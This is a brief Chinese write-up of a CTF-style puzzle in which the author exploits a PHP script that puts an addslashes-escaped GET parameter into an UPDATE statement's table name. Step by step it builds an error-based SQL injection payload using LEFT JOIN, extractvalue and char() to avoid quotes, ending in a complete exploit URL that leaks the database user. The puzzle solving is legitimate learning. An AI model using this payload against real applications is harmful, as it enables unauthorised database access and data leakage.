p牛在群里面出了一个好玩的题目，正好晚上空虚寂寞冷，就做一下暖暖身子，题目是：

<?php
$link = mysqli_connect('localhost', 'root', 'root'); mysqli_select_db($link, 'code');

$table = addslashes($_GET['table']);
$sql = "UPDATE {$table}
SET username='admin'
WHERE id=1";
if(!mysqli_query($link,$sql)) {
echo(mysqli_error($link)); } mysqli_close($link);


UPDATE student D
LEFT JOIN (SELECT
B.studentId,
SUM(B.score) AS s_sum,
ROUND(AVG(B.score),1) AS s_avg
FROM score B
WHERE b.examTime >= '2015-03-10'
GROUP BY B.studentId) C
ON (C.studentId = D.id)

SET D.score_sum = c.s_sum,
D.score_avg = c.s_avg
WHERE D.id =
(
SELECT
E.id FROM
(
SELECT
DISTINCT a.studentId AS id
FROM score A
WHERE A.examTime >= '2015-03-10'
) E
WHERE E.id = D.id
)
AND d.age = 1;


update table t left join (select id from table) tt on tt.user=t.username set username ='admin' where id=1;


update table t left join (select ‘1’ as user from dual) tt on tt.user=t.username set username ='admin' where id=1;


table t left join (select '1' as user from dual where (extractvalue(1,concat(0x7e,(select user()),0x7e)))) tt on tt.user=t.username


update table t left join (select \‘1\’ as user from dual where (extractvalue(1,concat(0x7e,(select user()),0x7e)))) tt on tt.user=t.username
where id=1


http://localhost/code.php?table=table t left join (select char(97) as user from dual where (extractvalue(1,concat(0x7e,(select user()),0x7e)))) tt on tt.user=t.username


update table t left join (select char(97) as user from dual where (extractvalue(1,concat(0x7e,(select user()),0x7e)))) tt on tt.user=t.username